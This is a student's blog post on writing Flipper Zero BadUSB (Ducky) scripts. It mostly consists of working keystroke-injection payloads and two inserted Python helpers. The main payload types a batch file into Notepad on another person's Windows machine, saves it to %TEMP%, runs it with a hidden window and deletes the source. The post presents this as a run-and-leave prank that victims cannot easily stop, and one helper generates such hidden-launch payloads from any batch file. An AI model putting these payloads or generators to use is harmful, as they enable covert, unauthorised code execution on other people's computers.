Thursday, September 5, 2024

2024-08-29 - Creating Ducky Scripts for Flipper Zero

 I bought a Flipper Zero, but this isn't going to be much of a talkative explanation about anything. This will be mostly technical. 

My instructor, Doug, says that if I can get the Flipper, using Ducky script, to open a .txt file on a Windows computer, then I can get it to do anything. I did already write two .bat scripts to keep on a jump drive that are meant for pranks, and they both utilize a .vbs script to keep them silent (invisible to the user) and also insert the .bat scripts into RAM so the jump drive can be removed. We are going to attempt to convert all this to Ducky script so that this can all be done through the Flipper Zero.

I created a file with nothing meaningful in it, but to get the Flipper to create a .txt on a Windows computer, here is what you need to write in Ducky script:

DELAY 500
GUI r
DELAY 300
STRING notepad
ENTER
DELAY 500
STRING This is a test file created by Flipper Zero.
DELAY 500
CTRL s
DELAY 500
STRING C:\Users\%USERNAME%\Desktop\flipper_output.txt
ENTER
DELAY 500
ALT F4

So, to explain what these commands do in Ducky script: the DELAY commands (the number is milliseconds) are necessary so that each action on the host has time to finish before the next keystrokes arrive; if Notepad has not opened yet when STRING starts typing, the text lands in whatever window has focus instead. GUI is the command for pressing the Windows key, since the Flipper is acting as a HID device (a keyboard). So GUI r means Windows+R, which brings up the Windows Run dialog. Next we have STRING notepad; this command tells the Flipper to type the word notepad into the selected field. ENTER obviously tells the Flipper to press the Enter key, executing the command. When Notepad opens, we have another STRING command. This time the selected field is Notepad itself, and whatever you type after the word STRING will be typed by the Flipper into Notepad on the Windows computer as if you were typing it yourself on the keyboard; STRING takes the rest of the line verbatim, so there is no comment or escape syntax inside it. CTRL s is Ctrl+S, which opens the Save As dialog in Notepad. "STRING C:\Users\%USERNAME%\Desktop\flipper_output.txt" tells the Flipper to type the file path and name of the file into the File name field. So I did not know that you could dictate the file path from the file name line followed by the filename so you wouldn't have to type more than one thing. Cool! And just so you know, %USERNAME% is an environment variable. So you don't need to know the username; you can simply type %USERNAME% in the string and the Windows file dialog expands it to whoever is logged in and saves to that user's Desktop. ENTER clicks the Save button. ALT F4 is the keyboard shortcut in Windows for closing the active window (program or folder), which in this case is closing Notepad.

REM Same payload as above, annotated. Ducky script has no inline comment
REM syntax: a '#' after a command is not a comment (after STRING it is typed
REM literally), so each note here is its own REM line.
DELAY 500
REM Win+R opens the Run dialog
GUI r
DELAY 300
REM Type "notepad" and launch it
STRING notepad
ENTER
REM Wait for Notepad to open, then type the file contents
DELAY 500
STRING This is a test file created by Flipper Zero.
REM Ctrl+S opens the Save As dialog
CTRL s
DELAY 500
REM The full path goes in the File name field; the dialog expands %USERNAME%
STRING C:\Users\%USERNAME%\Desktop\flipper_output.txt
REM Save, wait for the write to finish, then close Notepad
ENTER
DELAY 500
ALT F4

    Now, if you want to run .bat files on the Windows computer through Ducky script off the Flipper, there are two ways to do this. First, you can use the method above to have the Flipper write a file in Notepad and save it to be run, or the second method, which I prefer, is to have the Flipper open either Command Prompt or PowerShell and run the commands from there without saving a file to the computer.
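The command rules explained above (DELAY in milliseconds, GUI plus exactly one key, STRING taking the rest of the line verbatim, REM as the only comment) are easy to check mechanically before a payload is run against a real machine, and the mistakes they catch are the ones that cost time: a '#' note after a command, a lower-case F-key name, a STRING sent right after GUI r with no DELAY so the text lands in the wrong window, or a character the keyboard cannot type. The checker below is an added example for this post, not the author's code and not anything from the Flipper firmware. Its command and key lists are an assumed subset modelled on the Hak5 Ducky Script names the Flipper accepts (upper-case key names such as F4, one key after a modifier); extend them if your firmware supports more.

```python
"""Static checks for a Flipper Zero BadUSB / Ducky script (added example)."""
import re

# Commands that take a single integer argument (milliseconds or a count).
INT_COMMANDS = {"DELAY", "DEFAULT_DELAY", "DEFAULTDELAY", "REPEAT"}
# Modifier words that must be followed by exactly one key or character.
MODIFIERS = {"GUI", "WINDOWS", "CTRL", "CONTROL", "ALT", "SHIFT",
             "CTRL-ALT", "CTRL-SHIFT", "ALT-SHIFT", "ALT-GUI", "GUI-SHIFT"}
# Keys that stand on their own or follow a modifier (assumed subset).
KEYS = {"ENTER", "TAB", "SPACE", "ESC", "ESCAPE", "BACKSPACE", "DELETE",
        "INSERT", "HOME", "END", "PAGEUP", "PAGEDOWN", "CAPSLOCK",
        "PRINTSCREEN", "UP", "DOWN", "LEFT", "RIGHT", "UPARROW",
        "DOWNARROW", "LEFTARROW", "RIGHTARROW"} | {f"F{i}" for i in range(1, 13)}


def is_typable(text: str) -> bool:
    """The Flipper types printable 7-bit ASCII only (tabs go via TAB)."""
    return all(32 <= ord(c) <= 126 for c in text)


def _is_key(token: str) -> bool:
    # A named key, or a single printable character as in "GUI r" / "CTRL s".
    return token in KEYS or (len(token) == 1 and is_typable(token))


def check_ducky(script: str) -> list[str]:
    """Return human-readable problems, one per finding; [] means clean."""
    problems = []
    have_default_delay = False
    just_opened_run = False  # previous non-comment line was GUI r, no DELAY since
    for n, raw in enumerate(script.splitlines(), start=1):
        line = raw.rstrip()
        if not line.strip():
            continue
        cmd, _, rest = line.partition(" ")
        arg = rest.strip()
        if cmd == "REM":
            continue  # the only comment syntax; it does not reset the Run check
        if cmd in ("STRING", "STRINGLN"):
            if not is_typable(rest):
                problems.append(f"line {n}: {cmd} contains a character the keyboard cannot type")
            if re.search(r"\s{2,}#", rest):
                problems.append(f"line {n}: '#...' after {cmd} is not a comment, it is typed verbatim")
            if just_opened_run and not have_default_delay:
                problems.append(f"line {n}: typing right after GUI r with no DELAY; the Run box may not have focus yet")
        elif cmd in INT_COMMANDS:
            if not arg.isdigit():
                problems.append(f"line {n}: {cmd} needs one integer argument, got {arg!r}")
            if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
                have_default_delay = True
        elif cmd in MODIFIERS:
            tokens = rest.split()
            if len(tokens) != 1:
                problems.append(f"line {n}: {cmd} expects exactly one key, got {arg!r} (no inline comments)")
            elif not _is_key(tokens[0]):
                problems.append(f"line {n}: key {tokens[0]!r} not recognised (key names are upper-case, e.g. F4)")
        elif cmd in KEYS:
            if arg:
                problems.append(f"line {n}: unexpected text after {cmd}: {arg!r}")
        else:
            problems.append(f"line {n}: unknown command {cmd!r}")
        # Remember whether this line opened the Run dialog; any other line
        # (including a DELAY) clears the flag.
        just_opened_run = cmd in ("GUI", "WINDOWS") and arg.lower() == "r"
    return problems


if __name__ == "__main__":
    # Constructed sample: an annotated copy of the Notepad payload with '#' notes.
    sample = ("GUI r               # Opens the Run dialog\n"
              "STRING notepad       # Types notepad\n"
              "ENTER\nDELAY 500\nALT f4\n")
    for p in check_ducky(sample):
        print(p)
```

Run it over a payload .txt before copying the file to the Flipper; a clean script returns an empty list. The '#' heuristic only fires on two or more spaces followed by '#', so a '#' that genuinely belongs in typed text is left alone.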


    Thursday 2024-09-12 update 

    My classmate, Pierce, wants a Flipper Zero badly, but he doesn't have the money for one. I thought I might fan the flame to get him to want to buy one by letting him play with mine, and the benefit for me is that he helps me create Ducky scripts for the Flipper. So most of the time when I pull it out he will forgo other projects and work on it; in fact, all last weekend he worked on it for hours at a time trying to figure out how to convert into Ducky script the CAPS LOCK EVERY FIVE SECONDS prank script Doug and I wrote together, with parts in .bat and another part in .vbs. It uses both because of two problems, which will haunt us.

    It needs to run without the source file so it can be stored on a thumb drive, activated on someone else's computer, and you can run away with the thumb drive and it will keep turning caps lock on and off every five seconds until they figure out how to cancel it. It's not hard to cancel: you just need to reboot, or open Task Manager and, under BACKGROUND PROCESSES, end the task WINDOWS COMMAND PROCESSOR. So you need to use this line in .vbs:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

    CreateObject("Wscript.Shell") creates an instance of WScript.Shell, and .Run launches whatever command is passed to it. WScript.Arguments(0) is the first argument handed to the .vbs file when it is started (the path of the .bat), and the """" pieces on either side wrap that path in double quotes so it survives spaces in the path. The 0 is the window style, meaning no window at all, and False tells the script not to wait for the .bat to finish. That hidden window is the whole point, because it negates the prank if the user sees this caps lock loop running in a command line window; to stop it they can simply close the prompt and the process is ended.

    We worked today for hours to try and figure out how to convert this into Ducky script. Here's the problem: technically it can all be multiple scripts written in one Ducky script, because the Flipper acts as a keyboard, which, when connected to the host computer and the code is injected, will open a Run window in Windows with the command:

GUI r

And then it'll specify to use PowerShell, STRING, and then write the lines of code that PowerShell will deduce is .bat, with each line of code separated by a semicolon so it knows how to differentiate between separate commands on different lines that are all written in one line in the Run window. The Run window allows us to avoid opening the PowerShell window so that it runs in the background; however, the problem we run into here is that you can't run .vbs commands in the Run window. And when Doug and I were writing the .bat script for the caps lock prank, we were trying to figure out how to make this run in the background. We tried and tried and tried for weeks to get .bat to run the window in the background. We couldn't figure out how to do this. At this point it was probably back in January or March, so I don't remember much about what we did. But I eventually learned that while this is either really hard to do or impossible in .bat, we started to have another problem as well: once the thumb drive is removed, the script stops running and, hilariously, it starts running again when the drive is plugged back in. So we tried to solve both problems and this was extremely challenging.

    I had eventually asked Doug what he did after learning that other computer languages run in the background much more easily than .bat does. Since I had been programming the weather display in Python, and Python turned out to be one of the many languages that runs in the background easily, Doug told me that there is one huge problem with this: Python is not natively installed on all Windows machines, rendering this method useless, because in order to pull a prank on anyone you wish, it has to be in a language that everyone's Windows computer can run. You have to install Python in order for this to work.

    I toyed with the idea of having the script install Python at the beginning of the script, or a separate script that does so, so that the other scripts can run in Python. But I think you need permissions to do this, so that's out. Doug helped me, and we discovered multiple times through multiple methods, including stackoverflow.com, that the only way to run invisibly is to write a .vbs script that makes it run in the background, and around this time Doug parted with the information that he wrote all his prank scripts in .vbs but that it would be really hard for me to do. And another problem is that if I take on projects in .vbs, no one is hiring for that, so it'd be a waste of effort. But we wrote the separate .vbs script creating the object WScript.Shell and giving zero arguments so that it would not open a window, but creating this object would temporarily allow it to run without the source file.

    In Ducky script, you can tell it all in one script to write multiple scripts, and even define different languages; you just have to write everything in Ducky syntax with the addition of the code to be written on the host computer in the other programming languages with their proper syntax. Since Ducky is only telling the Flipper to write it, it doesn't actually know what these commands are; it doesn't need to know what they are doing or even how to interpret the language. The host computer will do all that; the Flipper just needs to write it. And Ducky actually looks pretty straightforward to write in. From what little I know, the syntax is kind of minimal and clean looking. And it has the added benefit that you can simply write it as a .txt and save it on the Flipper. The Flipper will run it in Ducky, no special Ducky extension required.

    But since the Run window cannot run .vbs, we now have to solve this problem all over again if we want to run all these prank scripts from the Flipper. Obviously this isn't crucial. I have a thumb drive with the original scripts for these pranks Doug and I created, and I can simply roll up to a computer, activate said scripts, and run away. But the cool thing about having a Flipper Zero is that it is built for this, and you can keep it in your pocket all the time. It acts as a remote, a hacking device, and a thumb drive with keyboard functionality. I can use it to enter usernames and passwords into foreign computers without having to go through the trouble of holding my phone with Bitwarden running in one hand and typing the password and username into another computer; I can simply plug in and, as long as I write the script properly, it will enter the username and password without issue. There are so many cool things that it does and I want to take advantage of all of them. I paid nearly $200 for this thing, so I want to get as much out of it as I can, and the reason I paid that money is so that I could use these cool methods and learn how to program it to do what I want, which sounded cool and I felt would also make me more employable.

    So far, the thumb drive scripts are made up of three scripts: one activation script in .bat, the actual caps lock every five seconds script in .bat, and then the .vbs which hides it and runs it in the background.

    Doug had Pierce and me figure out how to get Ducky to open Notepad, write out the script and then save it, which is where I learned a week or two ago that it can name and save the file where you want it all from the filename line in the Save As window. So we successfully got it to do that, and Doug was now satisfied that since we could do that, we can just copy and paste any script into the existing template that opens Run, which opens Notepad, and then saves it where we want it, and then runs it.

    I had a problem with this. It's a prank script, and to leave it on someone's computer runs the risk of them finding it and being able to use it for free without going through all the effort I am going through. I prefer to keep it for myself unless I decide to share it, which I will do easily; I just want it to be my choice to do so. And also, I hate the idea of leaving a file on a host computer which may or may not cause problems later. If you do this prank again to the same person on the same computer, it may try to write the file just for the computer to say this file already exists, would you like to overwrite it, and the script won't have that programmed in by default, and on purpose, because it will not be necessary on any computer that it hasn't been run on before. To add this step just in case may run the risk of the computer accidentally misinterpreting that extra command as yes, please overwrite, and instead perhaps changing something else when the computer does not ask if you want to overwrite a file.

    So we spent much of last night trying to figure out how to get .bat to hide the file and run it in the background. We wanted to run everything from the Run window because then it activates the script without opening a permanent window, and it can run .bat. The computer can also run PowerShell, which I think is .ps1 or .ps or something like that, I forgot; it has been a few months since I needed to know this for an exam. The computer can run .vbs but not from the Run window, and also Doug warned that employers are not hiring for this anymore since it is an outdated language, I guess.

    I scoured stackoverflow.com for other answers, but everybody that answered the question about hiding the shell window or running in the background all said you needed .vbs. I stopped and thought for a minute: if .vbs is still the only one that can do this, then is it really that outdated? A little while later, Doug reminded us that we could either write a command to do the Notepad option and then write a command that will delete it once it's no longer needed, or we can put it in a temp folder called:

%TEMP%

    So far, the Ducky script looks like this:

REM Type the caps-lock batch file into Notepad, save it under %TEMP%, then launch it hidden
DEFAULT_DELAY 100
DELAY 500
GUI r
DELAY 300
STRING notepad
ENTER
REM Give Notepad time to open before typing, or the text goes to the wrong window
DELAY 500
STRING @echo off
ENTER
STRING set "Toggle=0"
ENTER
STRING :loop
ENTER
STRING if %Toggle%==0 (
ENTER
TAB
STRING echo Turning Caps Lock on
ENTER
TAB
STRING set "Toggle=1"
ENTER
STRING ) else (
ENTER
TAB
STRING echo Turning Caps Lock off
ENTER
TAB
STRING set "Toggle=0"
ENTER
STRING )
ENTER
STRING powershell -command "$wsh = New-Object -ComObject WScript.Shell; $wsh.SendKeys('{CAPSLOCK}')"
ENTER
STRING timeout /t 5 /nobreak >nul
ENTER
STRING goto :loop
REM Ctrl+S, wait for the Save As dialog, type the path into the File name field
CTRL s
DELAY 500
STRING %TEMP%\CAPSLOCKAGAIN.bat
ENTER
DELAY 500
REM Close Notepad so it is not left open on the victim's screen
ALT F4
DELAY 300
GUI r
DELAY 300
STRING powershell
ENTER
REM PowerShell takes longer than Notepad to come up
DELAY 1000
STRING $batFileContent = Get-Content "$HOME\AppData\Local\Temp\CAPSLOCKAGAIN.bat"; $tempFile = [System.IO.Path]::GetTempPath() + 'script.bat'; Set-Content -Path $tempFile -Value $batFileContent; Start-Process -FilePath $tempFile -WindowStyle Hidden; Remove-Item "$HOME\AppData\Local\Temp\CAPSLOCKAGAIN.bat"; exit
ENTER
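The template Doug described (open Run, open Notepad, type the script line by line, save it under %TEMP%, then launch it) can be generated from a batch file rather than typed out STRING by STRING, and generating it also makes the "file already exists" worry from earlier easy to handle. The Python generator below is an added example for this post, not Pierce's or the author's script. Assumptions that are not in the post: the helper names, the delay values (tune them on a slow machine), and the launch line, which uses PowerShell's -WindowStyle Hidden straight from the Run box instead of the .vbs wrapper and moves the typed file to a fixed name, so Notepad never gets a chance to ask about replacing it on a second run.

```python
"""Generate the Notepad-and-%TEMP% Ducky payload described in the post (added example)."""


def is_typable(text: str) -> bool:
    """Printable 7-bit ASCII only; the Flipper cannot type anything else."""
    return all(32 <= ord(c) <= 126 for c in text)


def type_line(line: str) -> list[str]:
    """Ducky lines that reproduce one line of the target script in Notepad.

    STRING takes the rest of the Ducky line verbatim (no escaping, no comment
    syntax), so leading tabs become TAB keypresses and a blank line is a bare ENTER.
    """
    body = line.lstrip("\t")
    if not is_typable(body):
        raise ValueError(f"cannot type {line!r}: non-ASCII or control character")
    out = ["TAB"] * (len(line) - len(body))
    if body:
        out.append(f"STRING {body}")
    out.append("ENTER")
    return out


def run_box(command: str) -> list[str]:
    """Win+R, wait for the Run dialog, type a command, press Enter."""
    return ["GUI r", "DELAY 300", f"STRING {command}", "ENTER"]


def hidden_launch_command(name: str) -> str:
    """One Run-box line: move the typed file to a fixed name and start it with no window.

    Moving the file means the next run of the payload never hits Notepad's
    'file already exists, replace?' prompt. Move-Item -Force cannot replace
    script.bat while an earlier instance still has it open, so stop that first.
    """
    return (
        'powershell -WindowStyle Hidden -Command "'
        f"$s = Join-Path $env:TEMP '{name}'; "
        "$d = Join-Path $env:TEMP 'script.bat'; "
        "Move-Item $s $d -Force; "
        'Start-Process -FilePath $d -WindowStyle Hidden"'
    )


def batch_to_ducky(batch_text: str, name: str, launch: bool = True) -> str:
    """Full Ducky script: type batch_text into Notepad, save as %TEMP%\\name, run it hidden."""
    lines = [f"REM generated: writes {name} to %TEMP% and runs it hidden",
             "DEFAULT_DELAY 100", "DELAY 500"]
    lines += run_box("notepad")
    lines.append("DELAY 800")  # Notepad start-up; too short and text goes to the wrong window
    for raw in batch_text.splitlines():
        lines += type_line(raw)
    lines += ["CTRL s", "DELAY 500", f"STRING %TEMP%\\{name}", "ENTER",
              "DELAY 500", "ALT F4", "DELAY 300"]
    if launch:
        lines += run_box(hidden_launch_command(name))
    return "\n".join(lines) + "\n"


# Constructed sample payload: the caps-lock toggle loop from the post, in batch.
CAPS_LOCK_BAT = "\n".join([
    "@echo off",
    ":loop",
    "\tpowershell -command \"(New-Object -ComObject WScript.Shell).SendKeys('{CAPSLOCK}')\"",
    "\ttimeout /t 5 /nobreak >nul",
    "goto :loop",
])

if __name__ == "__main__":
    print(batch_to_ducky(CAPS_LOCK_BAT, "CAPSLOCKAGAIN.bat"), end="")
```

Run it and save the printed text as a .txt in the Flipper's badusb folder. The Flipper's keyboard layout has to match the host's, or punctuation such as ':' and '"' comes out wrong. The hidden batch runs under cmd.exe, so Stop-Process -Name cmd from a PowerShell prompt ends the loop without a reboot.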

    So, in case this matters, Pierce's version, which he started working on last weekend, is called CAPSLOCKAGAIN in order to differentiate it from mine, which is not yet converted to Ducky.

    It does work, but one of the problems we came across was that once it's activated, there's no WINDOWS COMMAND PROCESSOR task to end in Task Manager under BACKGROUND PROCESSES. So there's no way we know of yet to end this prank without rebooting, which can get to be too much trouble, especially when testing and you have to reboot all the time. These pranks were not meant to be so vicious. I would like to choose how vicious I get, and the more vicious I get while not intending to be so, the more I feel obligated to let the victims of these pranks off the hook easily and make it up to them.






